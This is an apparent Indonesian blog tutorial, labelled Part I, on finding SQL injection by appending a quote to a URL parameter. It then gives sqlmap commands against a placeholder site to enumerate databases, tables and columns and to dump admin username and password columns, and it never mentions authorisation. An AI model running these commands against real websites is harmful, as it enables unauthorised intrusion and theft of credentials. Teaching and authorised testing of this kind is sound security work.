Sql Injection For Web Penetration Testing (Web Hacking) Part I

Melakukan peetration testing dengan menggunakan methode Sql Injection, singkatnya seorang pentester dapat melakukan injeksi syntax sql pada website yang diuji keamanannya.

Cara mengetahui apakah website tersebut memiliki vulnerability Sql Injection dengan cara manmbahkan (‘\”) pada URL, apabila browser menampilkan error kira-kira seperti ini:

Contoh : http://www.somewebsite.com/photo-gallery.php?id=38′

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” AND website = 4′ at line 1

Sampai disini kita ketahui bahwa ada pesan error yang ditampilkan pada browser anda (firefox, chrome, etc….) xD. Error messages ini sepertinya familiar bagi Database administrator, karena apabila ada kesalahan pada syntax dalam administration MySQL, MariaDB etc… maka akan menampilkan errort tersebut.

Sebagai contohnya karena kesalahan pada syntax “show datababsess” maka akan menampilkan pesan error dikarenakan kesalahan padah syntax yang seharusnya “show databases“:

Selanjutnya kita akan menggunakan Sqlmap untuk mendapakan Database Name, Database Table, Database Column dan melakukan dumping untuk mendapatkan isi dari kolumn dataabse.

#Mencari Database Name

root@arbitrary:~# sqlmap -u http://www.somewebsite.com/photo-gallery.php?id=38 --dbs --random-agent

Hasilnya:

#Mencari Tables yang ada pada database tersebut

root@arbitrary:~# sqlmap -u http://www.somewebsite.com/photo-gallery.php?id=38 -D db_name --tables --random-agent

Hasilnya:

#Mencari Coulmn di dalam Tables dari Database

root@arbitrary:~# sqlmap -u http://www.somewebsite.com/photo-gallery.php?id=38 -D db_name -T db_tables --columns  --random-agent

Hasilnya:

#Dumping dari Column yang telah kita dapatkan dari db_name > db_tables > db_column_admin_password

root@arbitrary:~# sqlmap -u http://www.somewebsite.com/photo-gallery.php?id=38 -D db_name -T dbb_tables -C admin_password --dump  --random-agent

Hasilnya:

#Dumping db_column_admin_username

root@arbitrary:~# sqlmap -u http://www.somewebsite.com/photo-gallery.php?id=38 -D db_name -T dbb_tables -C admin_username --dump  --random-agent

Hasilnya:

 

0 replies

Leave a Reply

Want to join the discussion?
Feel free to contribute!

Leave a Reply

Your e-mail address will not be published. Required fields are marked *

*